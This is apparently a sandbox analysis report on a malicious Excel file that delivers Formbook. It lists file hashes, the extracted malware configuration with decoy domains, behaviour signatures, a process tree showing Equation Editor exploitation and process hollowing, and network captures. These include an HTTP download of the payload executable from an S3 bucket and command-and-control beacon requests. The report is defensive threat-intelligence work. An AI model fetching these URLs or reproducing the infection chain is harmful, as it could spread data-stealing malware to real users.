Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    59s
  • max time network
    59s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    10/01/2025, 21:00 UTC

General

  • Target

    c4036ae358676bba732bcb78f6f2768b7076074dff7eec3a74d745dc065e58a5.xlsx

  • Size

    1.8MB

  • MD5

    c3955c311b951719d7ab4985314fbab0

  • SHA1

    f48587590c94133e1f33f10b4da85c5ae151da09

  • SHA256

    c4036ae358676bba732bcb78f6f2768b7076074dff7eec3a74d745dc065e58a5

  • SHA512

    aeba2ac07f89ee650a169e15121c8bcd08cfe77ee5958cec0fe5bc59da27097318413900bfdd31a29e2c21756f19bfd5bc51dac01211cad75eeff1797121b858

  • SSDEEP

    49152:yKHGYSIGQZnSCR0JfTfDZMsSdg3e8mr+0sUj:BHfSb7bZjD0su

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

hwu6

Decoy

lf758.vip

locerin-hair.shop

vytech.net

pet-insurance-intl-7990489.live

thepolithat.buzz

d66dr114gl.bond

suv-deals-49508.bond

job-offer-53922.bond

drstone1.click

lebahsemesta57.click

olmanihousel.shop

piedmontcsb.info

trisula888x.top

66sodovna.net

dental-implants-83810.bond

imxtld.club

frozenpines.net

ffgzgbl.xyz

tlc7z.rest

alexismuller.design

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Formbook family
  • Formbook payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1208
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\c4036ae358676bba732bcb78f6f2768b7076074dff7eec3a74d745dc065e58a5.xlsx
      2⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:2548
    • C:\Windows\SysWOW64\autochk.exe
      "C:\Windows\SysWOW64\autochk.exe"
      2⤵
        PID:2972
      • C:\Windows\SysWOW64\autochk.exe
        "C:\Windows\SysWOW64\autochk.exe"
        2⤵
          PID:1740
        • C:\Windows\SysWOW64\autochk.exe
          "C:\Windows\SysWOW64\autochk.exe"
          2⤵
            PID:2756
          • C:\Windows\SysWOW64\autochk.exe
            "C:\Windows\SysWOW64\autochk.exe"
            2⤵
              PID:2664
            • C:\Windows\SysWOW64\autochk.exe
              "C:\Windows\SysWOW64\autochk.exe"
              2⤵
                PID:2732
              • C:\Windows\SysWOW64\autochk.exe
                "C:\Windows\SysWOW64\autochk.exe"
                2⤵
                  PID:1056
                • C:\Windows\SysWOW64\autochk.exe
                  "C:\Windows\SysWOW64\autochk.exe"
                  2⤵
                    PID:2792
                  • C:\Windows\SysWOW64\autochk.exe
                    "C:\Windows\SysWOW64\autochk.exe"
                    2⤵
                      PID:2620
                    • C:\Windows\SysWOW64\autochk.exe
                      "C:\Windows\SysWOW64\autochk.exe"
                      2⤵
                        PID:2628
                      • C:\Windows\SysWOW64\autochk.exe
                        "C:\Windows\SysWOW64\autochk.exe"
                        2⤵
                          PID:2636
                        • C:\Windows\SysWOW64\autochk.exe
                          "C:\Windows\SysWOW64\autochk.exe"
                          2⤵
                            PID:2668
                          • C:\Windows\SysWOW64\autochk.exe
                            "C:\Windows\SysWOW64\autochk.exe"
                            2⤵
                              PID:2696
                            • C:\Windows\SysWOW64\autochk.exe
                              "C:\Windows\SysWOW64\autochk.exe"
                              2⤵
                                PID:2740
                              • C:\Windows\SysWOW64\autochk.exe
                                "C:\Windows\SysWOW64\autochk.exe"
                                2⤵
                                  PID:2012
                                • C:\Windows\SysWOW64\autochk.exe
                                  "C:\Windows\SysWOW64\autochk.exe"
                                  2⤵
                                    PID:2200
                                  • C:\Windows\SysWOW64\autochk.exe
                                    "C:\Windows\SysWOW64\autochk.exe"
                                    2⤵
                                      PID:1852
                                    • C:\Windows\SysWOW64\autochk.exe
                                      "C:\Windows\SysWOW64\autochk.exe"
                                      2⤵
                                        PID:2680
                                      • C:\Windows\SysWOW64\autochk.exe
                                        "C:\Windows\SysWOW64\autochk.exe"
                                        2⤵
                                          PID:2264
                                        • C:\Windows\SysWOW64\autochk.exe
                                          "C:\Windows\SysWOW64\autochk.exe"
                                          2⤵
                                            PID:2428
                                          • C:\Windows\SysWOW64\autochk.exe
                                            "C:\Windows\SysWOW64\autochk.exe"
                                            2⤵
                                              PID:2660
                                            • C:\Windows\SysWOW64\autochk.exe
                                              "C:\Windows\SysWOW64\autochk.exe"
                                              2⤵
                                                PID:1960
                                              • C:\Windows\SysWOW64\autochk.exe
                                                "C:\Windows\SysWOW64\autochk.exe"
                                                2⤵
                                                  PID:2580
                                                • C:\Windows\SysWOW64\autochk.exe
                                                  "C:\Windows\SysWOW64\autochk.exe"
                                                  2⤵
                                                    PID:1640
                                                  • C:\Windows\SysWOW64\autochk.exe
                                                    "C:\Windows\SysWOW64\autochk.exe"
                                                    2⤵
                                                      PID:972
                                                    • C:\Windows\SysWOW64\autochk.exe
                                                      "C:\Windows\SysWOW64\autochk.exe"
                                                      2⤵
                                                        PID:1492
                                                      • C:\Windows\SysWOW64\cmstp.exe
                                                        "C:\Windows\SysWOW64\cmstp.exe"
                                                        2⤵
                                                        • Suspicious use of SetThreadContext
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious behavior: MapViewOfSection
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:1680
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          /c del "C:\Windows\SysWOW64\svchost.exe"
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2812
                                                    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                      1⤵
                                                      • Blocklisted process makes network request
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Launches Equation Editor
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3048
                                                      • C:\Users\Admin\AppData\Roaming\word.exe
                                                        C:\Users\Admin\AppData\Roaming\word.exe
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: MapViewOfSection
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2764
                                                        • C:\Windows\SysWOW64\svchost.exe
                                                          C:\Users\Admin\AppData\Roaming\word.exe
                                                          3⤵
                                                          • Suspicious use of SetThreadContext
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious behavior: MapViewOfSection
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2760

                                                    Network

                                                    • flag-us
                                                      DNS
                                                      combo.s3.eu-north-1.amazonaws.com
                                                      EQNEDT32.EXE
                                                      Remote address:
                                                      8.8.8.8:53
                                                      Request
                                                      combo.s3.eu-north-1.amazonaws.com
                                                      IN A
                                                      Response
                                                      combo.s3.eu-north-1.amazonaws.com
                                                      IN CNAME
                                                      s3-r-w.eu-north-1.amazonaws.com
                                                      s3-r-w.eu-north-1.amazonaws.com
                                                      IN A
                                                      52.95.171.76
                                                      s3-r-w.eu-north-1.amazonaws.com
                                                      IN A
                                                      16.12.10.22
                                                    • flag-se
                                                      GET
                                                      http://combo.s3.eu-north-1.amazonaws.com/bukron2.1.exe
                                                      EQNEDT32.EXE
                                                      Remote address:
                                                      52.95.171.76:80
                                                      Request
                                                      GET /bukron2.1.exe HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                      Host: combo.s3.eu-north-1.amazonaws.com
                                                      Connection: Keep-Alive
                                                      Response
                                                      HTTP/1.1 200 OK
                                                      x-amz-id-2: fcrzIT4n7C76q8qgcnP8sCbV0E1hUABWoTq8cTsVpJhn4c/S1F5KiNgg+d+l0hc/DcJlkU9QqpQ=
                                                      x-amz-request-id: JSRF9PM4KF9BQT51
                                                      Date: Fri, 10 Jan 2025 21:01:04 GMT
                                                      Last-Modified: Fri, 10 Jan 2025 12:28:41 GMT
                                                      ETag: "2691aa078c8eff65b38f3c0ca7f6762a"
                                                      x-amz-server-side-encryption: AES256
                                                      Accept-Ranges: bytes
                                                      Content-Type: application/x-msdownload
                                                      Content-Length: 1789952
                                                      Server: AmazonS3
                                                    • flag-us
                                                      DNS
                                                      www.piedmontcsb.info
                                                      Explorer.EXE
                                                      Remote address:
                                                      8.8.8.8:53
                                                      Request
                                                      www.piedmontcsb.info
                                                      IN A
                                                      Response
                                                      www.piedmontcsb.info
                                                      IN CNAME
                                                      cdn1.wixdns.net
                                                      cdn1.wixdns.net
                                                      IN CNAME
                                                      td-ccm-neg-87-45.wixdns.net
                                                      td-ccm-neg-87-45.wixdns.net
                                                      IN A
                                                      34.149.87.45
                                                    • flag-us
                                                      GET
                                                      http://www.piedmontcsb.info/hwu6/?LbCdXj=X9k0PT1Gf0+cIC9mciL9gJrAB1wQ4wWHrUEzn+ko0CLlw0uETlchFpHGI/1JJCBo&FHB=KTut_Fp8
                                                      Explorer.EXE
                                                      Remote address:
                                                      34.149.87.45:80
                                                      Request
                                                      GET /hwu6/?LbCdXj=X9k0PT1Gf0+cIC9mciL9gJrAB1wQ4wWHrUEzn+ko0CLlw0uETlchFpHGI/1JJCBo&FHB=KTut_Fp8 HTTP/1.1
                                                      Host: www.piedmontcsb.info
                                                      Connection: close
                                                      Response
                                                      HTTP/1.1 301 Moved Permanently
                                                      Content-Length: 0
                                                      Location: https://www.piedmontcsb.info/hwu6/?LbCdXj=X9k0PT1Gf0+cIC9mciL9gJrAB1wQ4wWHrUEzn+ko0CLlw0uETlchFpHGI/1JJCBo&FHB=KTut_Fp8
                                                      Accept-Ranges: bytes
                                                      Date: Fri, 10 Jan 2025 21:01:41 GMT
                                                      X-Served-By: cache-lhr-egll1980068-LHR
                                                      X-Cache: MISS
                                                      X-Wix-Request-Id: 1736542901.525031357645649182
                                                      X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,REmTqJKTo7BM/eF7JdTbUrxkNjrXdwdgtu6E0yACibU=
                                                      Via: 1.1 google
                                                      glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                      Connection: close
                                                    • flag-us
                                                      DNS
                                                      www.lebahsemesta57.click
                                                      Explorer.EXE
                                                      Remote address:
                                                      8.8.8.8:53
                                                      Request
                                                      www.lebahsemesta57.click
                                                      IN A
                                                      Response
                                                      www.lebahsemesta57.click
                                                      IN CNAME
                                                      lebahsemesta57.click
                                                      lebahsemesta57.click
                                                      IN A
                                                      198.252.111.49
                                                    • flag-us
                                                      GET
                                                      http://www.lebahsemesta57.click/hwu6/?LbCdXj=ODu4ekQErLK+QsfnwnIo8nVNut1O1Z6HvIcExxV1S9nCtnscp7Z+sMJrXD1ehaQA&FHB=KTut_Fp8
                                                      Explorer.EXE
                                                      Remote address:
                                                      198.252.111.49:80
                                                      Request
                                                      GET /hwu6/?LbCdXj=ODu4ekQErLK+QsfnwnIo8nVNut1O1Z6HvIcExxV1S9nCtnscp7Z+sMJrXD1ehaQA&FHB=KTut_Fp8 HTTP/1.1
                                                      Host: www.lebahsemesta57.click
                                                      Connection: close
                                                      Response
                                                      HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Fri, 10 Jan 2025 21:01:57 GMT
                                                      server: LiteSpeed
                                                    • 52.95.171.76:80
                                                      http://combo.s3.eu-north-1.amazonaws.com/bukron2.1.exe
                                                      http
                                                      EQNEDT32.EXE
                                                      47.5kB
                                                      1.8MB
                                                      939
                                                      1328

                                                      HTTP Request

                                                      GET http://combo.s3.eu-north-1.amazonaws.com/bukron2.1.exe

                                                      HTTP Response

                                                      200
                                                    • 34.149.87.45:80
                                                      http://www.piedmontcsb.info/hwu6/?LbCdXj=X9k0PT1Gf0+cIC9mciL9gJrAB1wQ4wWHrUEzn+ko0CLlw0uETlchFpHGI/1JJCBo&FHB=KTut_Fp8
                                                      http
                                                      Explorer.EXE
                                                      438 B
                                                      738 B
                                                      6
                                                      5

                                                      HTTP Request

                                                      GET http://www.piedmontcsb.info/hwu6/?LbCdXj=X9k0PT1Gf0+cIC9mciL9gJrAB1wQ4wWHrUEzn+ko0CLlw0uETlchFpHGI/1JJCBo&FHB=KTut_Fp8

                                                      HTTP Response

                                                      301
                                                    • 198.252.111.49:80
                                                      http://www.lebahsemesta57.click/hwu6/?LbCdXj=ODu4ekQErLK+QsfnwnIo8nVNut1O1Z6HvIcExxV1S9nCtnscp7Z+sMJrXD1ehaQA&FHB=KTut_Fp8
                                                      http
                                                      Explorer.EXE
                                                      396 B
                                                      1.2kB
                                                      5
                                                      5

                                                      HTTP Request

                                                      GET http://www.lebahsemesta57.click/hwu6/?LbCdXj=ODu4ekQErLK+QsfnwnIo8nVNut1O1Z6HvIcExxV1S9nCtnscp7Z+sMJrXD1ehaQA&FHB=KTut_Fp8

                                                      HTTP Response

                                                      404
                                                    • 8.8.8.8:53
                                                      combo.s3.eu-north-1.amazonaws.com
                                                      dns
                                                      EQNEDT32.EXE
                                                      79 B
                                                      132 B
                                                      1
                                                      1

                                                      DNS Request

                                                      combo.s3.eu-north-1.amazonaws.com

                                                      DNS Response

                                                      52.95.171.76
                                                      16.12.10.22

                                                    • 8.8.8.8:53
                                                      www.piedmontcsb.info
                                                      dns
                                                      Explorer.EXE
                                                      66 B
                                                      142 B
                                                      1
                                                      1

                                                      DNS Request

                                                      www.piedmontcsb.info

                                                      DNS Response

                                                      34.149.87.45

                                                    • 8.8.8.8:53
                                                      www.lebahsemesta57.click
                                                      dns
                                                      Explorer.EXE
                                                      70 B
                                                      100 B
                                                      1
                                                      1

                                                      DNS Request

                                                      www.lebahsemesta57.click

                                                      DNS Response

                                                      198.252.111.49

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • \Users\Admin\AppData\Roaming\word.exe

                                                      Filesize

                                                      1.7MB

                                                      MD5

                                                      2691aa078c8eff65b38f3c0ca7f6762a

                                                      SHA1

                                                      ba445b8fbb17de03e4d6baf1fd8e3d6552e70c50

                                                      SHA256

                                                      8eddb8196477fb5ea33d35eb1be98c68c1ca60847a3e79043a25aee0dde889c0

                                                      SHA512

                                                      a2cd17eb6ad5de1e5e58823ce87082a8be8b47e9725343039b51d32467910d322dea73af0d6168e8ac5b27c7fc3f23319854850eb81457b187868ee4ca3ecb22

                                                    • memory/1208-15-0x0000000003F90000-0x0000000004190000-memory.dmp

                                                      Filesize

                                                      2.0MB

                                                    • memory/1208-24-0x00000000050A0000-0x00000000051CD000-memory.dmp

                                                      Filesize

                                                      1.2MB

                                                    • memory/1680-19-0x00000000005E0000-0x00000000005F8000-memory.dmp

                                                      Filesize

                                                      96KB

                                                    • memory/1680-20-0x0000000000090000-0x00000000000BF000-memory.dmp

                                                      Filesize

                                                      188KB

                                                    • memory/2548-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/2548-1-0x000000007246D000-0x0000000072478000-memory.dmp

                                                      Filesize

                                                      44KB

                                                    • memory/2548-16-0x000000007246D000-0x0000000072478000-memory.dmp

                                                      Filesize

                                                      44KB

                                                    • memory/2760-13-0x0000000000400000-0x000000000042F000-memory.dmp

                                                      Filesize

                                                      188KB

                                                    • memory/2760-17-0x0000000000400000-0x000000000042F000-memory.dmp

                                                      Filesize

                                                      188KB

                                                    We care about your privacy.

                                                    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.